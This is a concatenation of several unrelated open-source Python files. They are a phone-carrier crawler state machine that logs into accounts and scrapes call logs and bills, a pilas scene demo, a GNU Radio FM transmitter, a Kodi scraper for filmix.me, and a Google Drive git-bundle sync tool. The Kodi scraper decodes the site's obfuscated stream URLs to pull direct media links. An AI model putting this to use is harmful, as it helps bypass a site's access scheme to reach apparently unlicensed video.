self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderLoginVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(UnderLoginVerifyRequestState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key, image_str = self.crawler.send_login_verify_request(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'WaitLogin'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.verify_content = image_str
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class WaitLoginState(BaseState):
def __init__(self, **kwargs):
super(WaitLoginState, self).__init__(**kwargs)
self.next_action = 'Login'
self.set_current_state()
def execute(self, **kwargs):
send_target = 'Get{}'.format(self.login_verify_type)
targets = [self.next_action, send_target]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
if action == send_target:
self.state_flag = 'UnderLoginVerifyRequest'
else:
self.state_flag = 'UnderLogin'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderLoginState(BaseState):
def __init__(self, **kwargs):
super(UnderLoginState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key = self.crawler.login(**self.parameters)
time_used = int(time.time()) - start_time
self.verify_type = self.crawler.get_verify_type(**self.parameters)
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
if ENV == 'prod' and self.cache_time:
self.state_flag = 'NoCrawl'
elif not self.verify_type:
self.state_flag = 'UnderCrawl'
else:
self.state_flag = 'WaitVerifyRequest'
elif code in [1, 2]:
status_code = STATUS_CODE[key]
self.state_flag = 'WaitLogin'
# if 'all_entry' in self.parameters.get('crawler', ''):
# self.state_flag = 'WaitLoginVerifyRequest'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class WaitVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(WaitVerifyRequestState, self).__init__(**kwargs)
self.next_action = 'Get{}'.format(self.verify_type)
self.set_current_state()
def execute(self, **kwargs):
targets = [self.next_action,"Login"]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
if "Login" == action:
self.state_flag = 'WaitVerifyRequest'
else:
if self.wait_code_get_login == True:
self.state_flag = 'WaitCode'
else:
self.state_flag = 'UnderVerifyRequest'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(UnderVerifyRequestState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key, image_str = self.crawler.send_verify_request(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'WaitCode'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.verify_content = image_str
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class WaitCodeState(BaseState):
def __init__(self, **kwargs):
super(WaitCodeState, self).__init__(**kwargs)
self.next_action = 'Verify'
self.set_current_state()
def execute(self, **kwargs):
send_target = 'Get{}'.format(self.verify_type)
targets = [self.next_action, send_target,'Login']
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
self.parameters.update(parameters)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
if not state_flag:
if action == send_target:
self.state_flag = 'UnderVerifyRequest'
# self.state_flag = 'WaitVerifyRequest'
elif "Login" == action:
self.state_flag = 'WaitVerifyRequest'
self.wait_code_get_login = True
else:
self.state_flag = 'UnderVerify'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderVerifyState(BaseState):
def __init__(self, **kwargs):
super(UnderVerifyState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key = self.crawler.verify(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'UnderCrawl'
elif code == 2:
status_code = STATUS_CODE[key]
self.state_flag = 'WaitCode'
if key in ['user_id_error', 'user_name_error']:
self.state_flag = 'Failed'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderCrawlState(BaseState):
def __init__(self, **kwargs):
super(UnderCrawlState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
user_info = {}
call_log = []
phone_bill = []
missing_log_list = []
possibly_missing_list = []
missing_bill_list = []
open_date = ''
# code, key, call_log, missing_log_list, possibly_missing_list = self.crawler.crawl_call_log(**self.parameters)
# Temporary change, to add the missing-page list for the mobile-mall crawler
start_time = int(time.time())
returns = self.crawler.crawl_call_log(**self.parameters)
if len(returns) == 5:
code, key, call_log, missing_log_list, possibly_missing_list = returns
part_missing_list = []
if len(returns) == 6:
code, key, call_log, missing_log_list, possibly_missing_list, part_missing_list = returns
status_code = STATUS_CODE[key]
# Save the contents of the call_from_set field
self.crawler.save_call_from_set()
total_missing_list = missing_log_list + possibly_missing_list
if (len(total_missing_list) == 6 or not call_log) and key == 'success':
status_code = STATUS_CODE['crawl_error']
# As long as crawl_call_log succeeds, the whole crawl counts as a success
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
state = {}
code, key, user_info = self.crawler.crawl_info(**self.parameters)
status_part = STATUS_CODE[key]
open_date = user_info.get('open_date', '')
state['state_name'] = 'crawl_info'
state['execute_status'] = status_part['status']
state['execute_message'] = status_part['message']
self.log(state=state)
code, key, phone_bill, missing_bill_list = self.crawler.crawl_phone_bill(**self.parameters)
status_part = STATUS_CODE[key]
#################### Bill fusion #######################
bill_cache_hit_month_list=[]
bill_fusion_cost_time=0
message=''
try:
# Perform bill data fusion
para_dict={'tel':self.tel,'sid':self.sid,'pad_code':'yulore',
'final_bill_logs':phone_bill,
'missing_month_list':missing_bill_list}
phone_bill, missing_bill_list, \
bill_cache_hit_month_list,bill_fusion_cost_time =bill_fusion(**para_dict)
except:
message = traceback.format_exc()
print message
pass
state['state_name'] = 'crawl_phone_bill'
state['execute_status'] = status_part['status']
state['execute_message'] = status_part['message']
missing_bill_dict = {'phone_bill_missing_month_list':missing_bill_list,'message':message}
self.log(state=state, missing_dict=missing_bill_dict)
time_used = int(time.time()) - start_time
# Handle the 20-minute crawler timeout
if time_used >= CRAWLER_TIME_OUT:
status_code = STATUS_CODE[FAILED_STATUS]
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
#################### Call-log fusion #######################
cache_hit_month_list=[]
fusion_cost_time=0
crawl_status=0
try:
# Perform call-log data fusion
para_dict={'tel':self.tel,'final_call_logs':call_log,
'missing_month_list':missing_log_list,
'possibly_missing_list':possibly_missing_list,
'part_missing_list':part_missing_list}
call_log, missing_log_list, \
possibly_missing_list, part_missing_list, \
cache_hit_month_list,fusion_cost_time =call_log_fusion(**para_dict)
except:
message = traceback.format_exc()
print message
pass
# Second check of the missing-month lists
total_missing_list = missing_log_list + possibly_missing_list
if (len(total_missing_list) == 6 or not call_log) :
pass
elif status_code != STATUS_CODE['success']:
crawl_status=copy.deepcopy(status_code['status'])
status_code = STATUS_CODE['success']
# As long as crawl_call_log succeeds, the whole crawl counts as a success
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.state_flag = 'End'
if open_date:
time_struct = time.localtime(int(open_date))
open_date_YM = '%d%02d'%(time_struct.tm_year, time_struct.tm_mon)
# log_missing_set = sorted(set(missing_log_list + possibly_missing_list))
# bill_missing_set = sorted(set(missing_bill_list))
pattern = lambda x: [i for i in x if i > open_date_YM]
missing_log_list = pattern(missing_log_list)
possibly_missing_list = pattern(possibly_missing_list)
missing_bill_list = pattern(missing_bill_list)
save_data(self.sid, tel=self.tel, call_log=call_log, phone_bill=phone_bill,
user_info=user_info, status=status_code['status'], message=status_code['message'],
missing_log_list=missing_log_list, possibly_missing_list=possibly_missing_list,
missing_bill_list=missing_bill_list, part_missing_list=part_missing_list,
cache_hit_month_list=cache_hit_month_list,fusion_cost_time=fusion_cost_time,
crawl_status=crawl_status,bill_cache_hit_month_list=bill_cache_hit_month_list,
bill_fusion_cost_time=bill_fusion_cost_time)
call_log_missing_dict = {
'call_log_missing_month_list':missing_log_list,
'call_log_possibly_missing_month_list':possibly_missing_list,
'call_log_part_missing_list': part_missing_list,
'cache_hit_month_list':cache_hit_month_list,
'data_fusion_cost_time':fusion_cost_time,
'crawl_status':crawl_status,
'bill_cache_hit_month_list':bill_cache_hit_month_list,
'bill_fusion_cost_time':bill_fusion_cost_time
}
self.log(missing_dict=call_log_missing_dict)
class FailedState(BaseState):
def __init__(self, **kwargs):
super(FailedState, self).__init__(**kwargs)
self.next_action = 'Reset'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
save_status(self.sid, self.pre_status, self.pre_message)
self.log()
class AbortState(BaseState):
def __init__(self, **kwargs):
super(AbortState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['user_exit']['status']
message = STATUS_CODE['user_exit']['message']
save_status(self.sid, status, message)
self.log()
class EndState(BaseState):
def __init__(self, **kwargs):
super(EndState, self).__init__(**kwargs)
self.next_action = 'Finish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
self.log()
class NoCrawlState(BaseState):
def __init__(self, **kwargs):
super(NoCrawlState, self).__init__(**kwargs)
self.next_action = 'NoCrawlFinish'
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['result_exists']['status']
message = STATUS_CODE['result_exists']['message']
save_status(self.sid, status, message, cache_time=self.cache_time)
self.log()
class NoneState(BaseState):
def __init__(self, **kwargs):
super(NoneState, self).__init__(**kwargs)
self.next_action = 'Unsupported'
self.need_parameters = {
'need_full_name': 0,
'need_id_card': 0,
'need_pin_pwd': 0,
'need_sms_verify': 0,
'need_captcha_verify': 0
}
self.set_current_state()
def execute(self, **kwargs):
self.state_flag = ''
status = STATUS_CODE['no_supported_crawler']['status']
message = STATUS_CODE['no_supported_crawler']['message']
save_status(self.sid, status, message)
self.log()
CLASS_LIST = inspect.getmembers(sys.modules[__name__], inspect.isclass)
CLASS_DICT = {pair[0]:pair[1] for pair in CLASS_LIST}
def state_interface(**kwargs):
state_flag = kwargs.pop('state_flag')
if not state_flag:
return None
state_flag = '{}State'.format(state_flag)
return CLASS_DICT[state_flag](**kwargs)
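# ---------------------------------------------------------------------------
# Illustrative, self-contained toy (not part of this worker): the same
# "collect classes, look them up by name, instantiate with **kwargs" dispatch
# that state_interface() performs, reduced to hypothetical demo classes so the
# pattern is easy to follow in isolation. Nothing below is used by the worker.
# ---------------------------------------------------------------------------
class _DemoStartState(object):
    def __init__(self, **kwargs):
        self.tel = kwargs.get('tel')

class _DemoEndState(object):
    def __init__(self, **kwargs):
        self.tel = kwargs.get('tel')

_DEMO_STATES = {'Start': _DemoStartState, 'End': _DemoEndState}

def _demo_state_interface(state_flag, **kwargs):
    # Same contract as state_interface(): an empty flag means "no next state".
    if not state_flag:
        return None
    return _DEMO_STATES[state_flag](**kwargs)
# _demo_state_interface('Start', tel='0000000000').tel -> '0000000000'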
| Svolcano/python_exercise | dianhua/worker/state/standard_state.py | Python | mit | 19,615 |
import pilas
from pilas.escena import Normal
from pilas.escena import Pausa
class EscenaDeMenu(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.fondos.Color(pilas.colores.negro)
pilas.actores.Texto("Bienvenidos al ejemplo de escenas apiladas.",
y=200)
opciones = [
('Cambiar a Escena 1', self.cambiar_escena_1),
('Almacenar y Cambiar a Escena 2', self.cambiar_escena_2),
('Salir', self.salir)]
self.menu = pilas.actores.Menu(opciones)
def cambiar_escena_1(self):
pilas.cambiar_escena(Escena_1())
def cambiar_escena_2(self):
pilas.almacenar_escena(Escena_2())
def salir(self):
import sys
sys.exit(0)
class Escena_1(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.actores.Texto("Acabas de cambiar a la Escena 1.\n\
Intenta mover la nave por la pantalla con el teclado.",
y=200)
pilas.actores.Texto("Pulsa la tecla 'ESC' para regresar al menu \n\
, la tecla '2' para ir a la Escena 2\n\n\
o la tecla 'p' para Pausar\n\n\
Si vas a la Escena 2 y regresas, la nave\n\
seguira en la misma posicion donde la dejaste.")
self.nave = pilas.actores.Nave()
self.pulsa_tecla_escape.conectar(self.ir_a_menu)
self.pulsa_tecla.conectar(self.cuando_pulsa_tecla)
def ir_a_menu(self, evento):
pilas.cambiar_escena(EscenaDeMenu())
def cuando_pulsa_tecla(self, evento):
if evento.texto == u'2':
pilas.almacenar_escena(Escena_2())
if evento.texto == u'a':
print self.actores
if evento.texto == u'p':
pilas.escena.pausar()
class Escena_2(pilas.escena.Normal):
def __init__(self):
Normal.__init__(self)
def iniciar(self):
pilas.fondos.Tarde()
pilas.actores.Texto("Acabas de cambiar a la Escena 2.", y=200)
pilas.actores.Texto("Pulsa la tecla 'ESC' para regresar a la\n\
escena anterior.")
self.pulsa_tecla_escape.conectar(self.ir_a_escena_anterior)
def ir_a_escena_anterior(self, evento):
pilas.recuperar_escena()
pilas.iniciar()
pilas.cambiar_escena(EscenaDeMenu())
pilas.ejecutar()
| irvingprog/pilas | pilas/ejemplos/ejemplos/escenas/escenas_apiladas.py | Python | lgpl-3.0 | 2,369 |
#
# Copyright 2005,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import math
from gnuradio import gr, filter
from .fm_emph import fm_preemph
from . import analog_python as analog
class nbfm_tx(gr.hier_block2):
"""
Narrow Band FM Transmitter.
Takes a single float input stream of audio samples in the range [-1,+1]
and produces a single FM modulated complex baseband output.
Args:
audio_rate: sample rate of audio stream, >= 16k (integer)
quad_rate: sample rate of output stream (integer)
tau: preemphasis time constant (default 75e-6) (float)
max_dev: maximum deviation in Hz (default 5e3) (float)
fh: high frequency at which to flatten preemphasis; < 0 means default of 0.925*quad_rate/2.0 (float)
quad_rate must be an integer multiple of audio_rate.
"""
def __init__(self, audio_rate, quad_rate, tau=75e-6, max_dev=5e3, fh=-1.0):
gr.hier_block2.__init__(self, "nbfm_tx",
gr.io_signature(1, 1, gr.sizeof_float), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
# FIXME audio_rate and quad_rate ought to be exact rationals
self._audio_rate = audio_rate = int(audio_rate)
self._quad_rate = quad_rate = int(quad_rate)
if quad_rate % audio_rate != 0:
raise ValueError("quad_rate is not an integer multiple of audio_rate")
do_interp = audio_rate != quad_rate
if do_interp:
interp_factor = int(quad_rate / audio_rate) # force integer
interp_taps = filter.optfir.low_pass(interp_factor, # gain
quad_rate, # Fs
4500, # passband cutoff
7000, # stopband cutoff
0.1, # passband ripple dB
40) # stopband atten dB
#print("len(interp_taps) =", len(interp_taps))
self.interpolator = filter.interp_fir_filter_fff (interp_factor, interp_taps)
self.preemph = fm_preemph(quad_rate, tau=tau, fh=fh)
k = 2 * math.pi * max_dev / quad_rate
self.modulator = analog.frequency_modulator_fc(k)
if do_interp:
self.connect(self, self.interpolator, self.preemph, self.modulator, self)
else:
self.connect(self, self.preemph, self.modulator, self)
def set_max_deviation(self, max_dev):
k = 2 * math.pi * max_dev / self._quad_rate
self.modulator.set_sensitivity(k)
class ctcss_gen_f(gr.hier_block2):
def __init__(self, sample_rate, tone_freq):
gr.hier_block2.__init__(self, "ctcss_gen_f",
gr.io_signature(0, 0, 0), # Input signature
gr.io_signature(1, 1, gr.sizeof_float)) # Output signature
self.plgen = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE,
tone_freq, 0.1, 0.0)
self.connect(self.plgen, self)
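# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this module: a minimal flowgraph feeding a
# test tone through nbfm_tx into a null sink, assuming a standard GNU Radio
# install (gr.top_block, analog.sig_source_f, blocks.null_sink). The rates and
# the 1 kHz tone are placeholders; quad_rate (192 kHz) is an integer multiple
# of audio_rate (48 kHz), as the constructor requires. Defined, never called.
# ---------------------------------------------------------------------------
def _example_nbfm_flowgraph():
    from gnuradio import blocks  # assumed available alongside gr-analog
    tb = gr.top_block()
    tone = analog.sig_source_f(48000, analog.GR_SIN_WAVE, 1000, 0.5, 0.0)
    tx = nbfm_tx(audio_rate=48000, quad_rate=192000, tau=75e-6, max_dev=5e3)
    sink = blocks.null_sink(gr.sizeof_gr_complex)
    tb.connect(tone, tx, sink)
    return tb  # caller would tb.start() / ... / tb.stop(); tb.wait()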
| sdh11/gnuradio | gr-analog/python/analog/nbfm_tx.py | Python | gpl-3.0 | 3,307 |
# -*- coding: utf-8 -*-
"""
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urllib
import urlparse
import json
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser
from resources.lib.modules import tvmaze
class source:
def __init__(self):
self.priority = 1
self.language = ['ru']
self.domains = ['filmix.me']
self.base_link = 'https://filmix.me'
self.search_link = '/engine/ajax/sphinx_search.php'
self.search_old = '/search/%s'
self.player_link = '/api/movies/player_data'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search([localtitle] + source_utils.aliases_to_array(aliases), year)
if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases), year)
return urllib.urlencode({'url': url}) if url else None
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases), year)
if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases), year)
return urllib.urlencode({'url': url, 'tvdb': tvdb}) if url else None
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
data.update({'season': season, 'episode': episode})
return urllib.urlencode(data)
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
url = data.get('url')
season = data.get('season')
episode = data.get('episode')
abs_episode = 0
if season and episode:
abs_episode = str(tvmaze.tvMaze().episodeAbsoluteNumber(data.get('tvdb'), int(season), int(episode)))
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = r.decode('cp1251').encode('utf-8')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'players'}, req='data-player')
r = [(i.attrs['data-player'], dom_parser.parse_dom(i, 'a', req='href')) for i in r]
r = [(i[0], i[1][0].attrs['href']) for i in r if i[1]]
for post_id, play_url in r:
i = client.request(play_url, referer=url, output='extended')
headers = i[3]
headers.update({'Cookie': i[2].get('Set-Cookie')})
i = client.request(urlparse.urljoin(self.base_link, self.player_link), post={'post_id': post_id}, headers=headers, referer=i, XHR=True)
i = json.loads(i).get('message', {}).get('translations', {}).get('flash', {})
for title, link in i.iteritems():
try:
link = self.decode_direct_media_url(link)
if link.endswith('.txt'):
link = self.decode_direct_media_url(client.request(link))
link = json.loads(link).get('playlist', [])
link = [i.get('playlist', []) for i in link]
link = [x.get('file') for i in link for x in i if (x.get('season') == season and x.get('serieId') == episode) or (x.get('season') == '0' and x.get('serieId') == abs_episode)][0]
urls = [(source_utils.label_to_quality(q), self.format_direct_link(link, q)) for q in self.get_qualitys(link)]
urls = [{'quality': x[0], 'url': x[1]} for x in urls if x[0] in ['SD', 'HD']] # filter premium
for i in urls: sources.append({'source': 'CDN', 'quality': i['quality'], 'info': title, 'language': 'ru', 'url': i['url'], 'direct': True, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
def __search(self, titles, year):
try:
url = urlparse.urljoin(self.base_link, self.search_link)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
post = {'story': titles[0], 'years_ot': str(int(year) - 1), 'years_do': str(int(year) + 1)}
r = client.request(url, post=post, XHR=True)
if len(r) < 1000:
url = urlparse.urljoin(self.base_link, self.search_old % urllib.quote_plus(titles[0]))
r = client.request(url)
r = r.decode('cp1251').encode('utf-8')
r = dom_parser.parse_dom(r, 'article')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'full'})
r = [(dom_parser.parse_dom(i, 'a', attrs={'itemprop': 'url'}, req='href'),
dom_parser.parse_dom(i, 'h3', attrs={'class': 'name'}, req='content'),
dom_parser.parse_dom(i, 'div', attrs={'class': 'origin-name'}, req='content'),
dom_parser.parse_dom(i, 'div', attrs={'class': 'year'})) for i in r]
r = [(i[0][0].attrs['href'], i[1][0].attrs['content'], i[2][0].attrs['content'], dom_parser.parse_dom(i[3], 'a', attrs={'itemprop': 'copyrightYear'})) for i in r if i[0] and i[1] and i[2]]
r = [(i[0], i[1], i[2], i[3][0].content) for i in r if i[3]]
r = [i[0] for i in r if (cleantitle.get(i[1]) in t or cleantitle.get(i[2]) in t) and i[3] in y][0]
return source_utils.strip_domain(r)
except:
return
########################
# Credits to evgen_dev #
########################
def decode_direct_media_url(self, encoded_url):
import base64
codec_a = ("l", "u", "T", "D", "Q", "H", "0", "3", "G", "1", "f", "M", "p", "U", "a", "I", "6", "k", "d", "s", "b", "W", "5", "e", "y", "=")
codec_b = ("w", "g", "i", "Z", "c", "R", "z", "v", "x", "n", "N", "2", "8", "J", "X", "t", "9", "V", "7", "4", "B", "m", "Y", "o", "L", "h")
i = 0
for a in codec_a:
b = codec_b[i]
i += 1
encoded_url = encoded_url.replace(a, '___')
encoded_url = encoded_url.replace(b, a)
encoded_url = encoded_url.replace('___', b)
return base64.b64decode(encoded_url)
def get_qualitys(self, source_link):
try:
avail_quality = re.compile("\[([^\]]+)\]", re.S).findall(source_link)[0]
return [i for i in avail_quality.split(',') if i]
except:
return '0'.split()
def format_direct_link(self, source_link, q):
regex = re.compile("\[([^\]]+)\]", re.IGNORECASE)
return regex.sub(q, source_link)
| repotvsupertuga/repo | script.module.stream.tvsupertuga.addon/resources/lib/sources/ru/filmix.py | Python | gpl-2.0 | 8,036 |
import os
from core import utilities
from core import args
from core import gitLib
from core import google
from core import pathLib
class RepoLib:
"""Manages interactions of git repository in google drive"""
# CTOR
def __init__(self):
print('Google Driver Git Repository @lukegeorge, version 0.1')
self._argLib = args.Arguments()
self._pathLib = pathLib.PathLib(self._argLib)
self._gapi = None
def repoVersion(self):
print('Print the version of the repository on the drive')
repoFileName = self._pathLib.getBundleFileName()
# Try to retrieve the given repository from the Google Drive store
repoMetadata = self.getGoogleApi().getRepo(repoFileName)
# Print the info
print("Current version on drive (" + self.printMetadata(repoMetadata) + ")")
def sync(self):
print('Sync local repository from google drive')
# Try to sync the local bundle file
metadata = self.trySyncLocalBundle()
gitRepoFolder = self._argLib.getGitRepoFolder()
bundleFilePath = self._pathLib.getBundleFilePath()
if utilities.nonexistentOrEmptyFolder(gitRepoFolder):
print('Folder "' + gitRepoFolder + '" null or emtpy. Try to create it ...')
# Repository not yet initialized, create the folder
utilities.createFolderIfNotExist(gitRepoFolder)
# Clone then the bundle
gitLib.cloneFromBundle(gitRepoFolder, bundleFilePath)
else:
# Folder not empty. Check it is a valid Git Repository
gitRepo = gitLib.GitLib(self._argLib.getGitRepoFolder())
print('Folder "' + gitRepoFolder + '" is a valid Git Repository')
# Fetch the last version
gitRepo.fetchFromBundle(bundleFilePath)
print('Sync local repository complete')
def push(self):
print('Push local repository changes to google drive')
gitRepoFolder = self._argLib.getGitRepoFolder()
repoFileName = self._pathLib.getBundleFileName()
bundleFilePath = self._pathLib.getBundleFilePath()
# Try to sync the local bundle file
metadata = self.trySyncLocalBundle()
# Get the HEAD version of the synced repo
original_head = gitLib.getBunldeHead(bundleFilePath)
print('Head of the existing bundle before bundling: ' + original_head)
# Open the git repository
gitRepo = gitLib.GitLib(gitRepoFolder)
# Now we bundle the current repo
gitRepo.bundleRepo(bundleFilePath)
# Recalculate the head
pushed_head = gitLib.getBunldeHead(bundleFilePath)
print('Head of the existing bundle after bundling: ' + pushed_head)
# Check the bundle has changed
if original_head == pushed_head:
# Local repository hasn't been updated, return
print('Git repo has not changed, discard bundle')
return
print('New head version, pushing to drive')
# Upload the new version
metadata = self.getGoogleApi().updateRepo(bundleFilePath, metadata[google.F_ID])
# Delete older versions
print('Deleting older drive revisions ...')
self.getGoogleApi().deleteAllRevisionButHead(metadata)
print('Older drive revisions deleted')
# Download again the bundle metadata, since the version number may be updated
metadata = self.getGoogleApi().getRepo(repoFileName)
# Update the metadata
self.updateBundleMetadata(metadata, pushed_head)
print('Local metadata updated')
print('Pushing to drive complete')
def init(self):
print('Initialize a new repository on google drive')
print('If the repository is already initialized, throw an exception')
gitRepoFolder = self._argLib.getGitRepoFolder()
repoFileName = self._pathLib.getBundleFileName()
# Try to retrieve the given repository from the google drive store
api = self.getGoogleApi()
gBundleFile = api.getRepo(repoFileName)
if gBundleFile is None:
# Open the git repository
gitRepo = gitLib.GitLib(gitRepoFolder)
# Bundle the repository
bundleFilePath = self._pathLib.getBundleFilePath()
gitRepo.bundleRepo(bundleFilePath)
# initialize the repository on google drive
print("Initializing repository '" + repoFileName + "'...")
metadata = api.createRepo(bundleFilePath, repoFileName)
print("Repository '" + repoFileName + "' initialized")
else:
raise Exception("The repository '" + repoFileName + "' already initialized on the google drive. Cannot initialize the repository")
def tryUploadNewVersion(self):
"""Upload the local bundle file to google drive"""
repoFileName = self._pathLib.getBundleFileName()
repoLocalPath = self._pathLib.getBundleFilePath()
repoMetadataPath = self._pathLib.getJsonFilePath()
# Try to retrieve the given repository from the google drive store
gBundleFile = self.getGoogleApi().getRepo(repoFileName)
if gBundleFile is None:
raise Exception("The repository '" + repoFileName + "' does not exist on the drive")
# Upload the new version
def trySyncLocalBundle(self):
"""Sync the drive bundle file on local disk"""
repoFileName = self._pathLib.getBundleFileName()
repoLocalPath = self._pathLib.getBundleFilePath()
repoMetadataPath = self._pathLib.getJsonFilePath()
# Try to retrieve the given repository from the google drive store
gBundleFile = self.getGoogleApi().getRepo(repoFileName)
if gBundleFile is None:
raise Exception("The repository '" + repoFileName + "' does not exist on the drive")
driveFileSize = gBundleFile[google.F_SIZE]
driveFileId = gBundleFile[google.F_ID]
print("Found repository on drive (" + self.printMetadata(gBundleFile) + ")")
# Check whether the local file exists
if os.path.isfile(repoLocalPath) and os.path.isfile(repoMetadataPath):
# load the metadata
metadata = self.readMetadata()
# Check whether the metadata refers to the bundle on the drive
if metadata[google.F_ID] != gBundleFile[google.F_ID]:
raise Exception("The repository with name '" + repoFileName +
"' found on drive doesn't match the ID of the locally stored metadata")
# Parse the versions
localVersion = int(metadata[google.F_VERSION])
driveVersion = int(gBundleFile[google.F_VERSION])
# If the repository matched the locally stored id, check if a new version is available
if driveVersion > localVersion:
# Download the new version
print("An old version is saved on disk (" +
str(localVersion) + "<" + str(driveVersion) +
"). Download the new version ...")
self.downloadBundle(gBundleFile)
else:
print("The local repository is up to date. Current version (" +
str(localVersion) + "), Drive version (" +
str(driveVersion) + ")")
else:
# Download the current drive version on disk
print("No local repository available on disk. Start download ...")
self.downloadBundle(gBundleFile)
return gBundleFile
def downloadBundle(self, gBundleFile):
"""Clear and download the bundle file into a temporary location along with its metadata"""
repoLocalPath = self._pathLib.getBundleFilePath()
# Delete existing bundle file
if os.path.exists(repoLocalPath):
os.remove(repoLocalPath)
# Local bundle file not yet downloaded
self.getGoogleApi().downloadFile(repoLocalPath, gBundleFile['id'])
# Update the metadata
self.updateBundleMetadata(gBundleFile, gitLib.getBunldeHead(repoLocalPath))
print("New version downloaded (" + self.printMetadata(gBundleFile) + ")")
def updateBundleMetadata(self, gBundleFile, head):
repoMetadataPath = self._pathLib.getJsonFilePath()
# Delete existing metadata file
if os.path.exists(repoMetadataPath):
os.remove(repoMetadataPath)
# Create json file
metadata = {
google.F_ID: gBundleFile[google.F_ID],
google.F_VERSION: gBundleFile[google.F_VERSION],
